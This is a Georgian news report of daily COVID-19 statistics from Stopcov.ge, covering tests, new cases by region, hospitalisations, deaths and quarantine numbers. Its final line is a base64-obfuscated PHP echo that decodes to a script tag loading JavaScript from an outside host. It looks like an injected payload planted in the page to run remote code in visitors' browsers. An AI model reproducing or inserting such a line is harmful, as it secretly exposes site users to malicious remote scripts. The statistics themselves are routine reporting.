celsiusi
ავერსი საქკაბელი
Stopcov.ge-ზე გამოქვეყნებული ინფორმაციის თანახმად, დღევანდელი მონაცემებით, ჩატარდა 30 149 ტესტი, გამოვლინდა ინფიცირების 2 490 ახალი შემთხვევა, გამოჯანმრთელდა 2 056 პირი, დადებითობის დღიური მაჩვენებელი არის 8.26%
 
Stopcov.ge-ზე გამოქვეყნებული ინფორმაციის თანახმად, ინტენსიური ტესტირების ფარგლებში, ბოლო 24 საათში ქვეყნის მასშტაბით ჩატარდა 30 149 კვლევა ტესტით, მათ შორის 17 500 კვლევა ანტიგენის ტესტით და 12 649 PCR ტესტით.
 
ჩატარებული ტესტირების შედეგად, ბოლო 24 საათში გამოვლინდა ვირუსით ინფიცირების 2 490 ახალი დადასტურებული შემთხვევა. ქვეყანაში კოვიდ-19-ის პანდემიის გავრცელებიდან დღემდე გამოვლენილი დადასტურებული შემთხვევების საერთო რაოდენობა შეადგენს 634 053-ს.
 
რაც შეეხება დადებითობის მაჩვენებელს, 9 ოქტომბრის მდგომარეობით, დადებითობის დღიური მაჩვენებელი არის 8.26%, ბოლო 14 დღის მანძილზე - 6.12% ხოლო 7 დღის მანძილზე - 7.36%.
 
ბოლო 24 საათში ვირუსისგან გამოჯანმრთელდა 2 056 პირი, ხოლო ჯამში გამოჯანმრთელებულთა რაოდენობა გაიზარდა 600 524.
 
ბოლო 24 საათში კორონავირუსით გარდაცვალების 25 ახალი შემთხვევა დაფიქსირდა. პანდემიის გავრცელებიდან დღემდე ვირუსს ჯამში 9 246 პირი ემსხვერპლა.
 
დღეს ქვეყანაში გამოვლენილი ინფიცირების 2 490 ახალი შემთხვევიდან:
 
თბილისში გამოვლენილია 708 შემთხვევა, აჭარა - 130, იმერეთი - 482, ქვემო ქართლი - 133, შიდა ქართლი - 81, გურია - 55, სამეგრელო - ზემო სვანეთი - 284, კახეთი - 500, მცხეთა-მთიანეთი - 46, სამცხე-ჯავახეთი - 53, რაჭა-ლეჩხუმი და ქვემო სვანეთი - 18.
 
ამ ეტაპზე ინფიცირების მიმდინარე აქტიური შემთხვევაა 24 257 საიდანაც:
 
4 328 ადამიანი მკურნალობს საავადმყოფოში, მათ შორის, თბილისის საავადმყოფოებში - 1 442, აჭარაში - 404, იმერეთში - 1 026.
 
ამ ეტაპზე მძიმე პაციენტია 962 პირი, მათშორის, თბილისში - 318, აჭარაში - 88, იმერეთში - 318. ხელოვნური სუნთქვის აპარატზე იმყოფება 258 პირი, მათგან თბილისში - 136, აჭარაში - 26, იმერეთში - 28.
 
672 ადამიანი მოთავსებულია კლინიკურ-სასტუმროებში, მათ შორის 337 - თბილისში, 185 - აჭარაში.
 
19 257 პირი ვირუსის მკურნალობის კურსს გადის საცხოვრებელ ბინაზე.
 
საკარანტინე სივრცეებში მოთავსებულია 68 ადამიანი, მათ შორის, თბილისში - 61, ხოლო აჭარაში - 7.
 
სულ 2020 წლის 6 ოქტომბრიდან - მ/წ 9 ოქტომბრის პერიოდში, სახელმწიფო საზღვრიდან საკარანტინე სივრცეებში გადაყვანილია - 25 230 პირი.
 
ამ ეტაპისთვის თვითიზოლაციაში იმყოფება 18 287 ადამიანი.
988
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");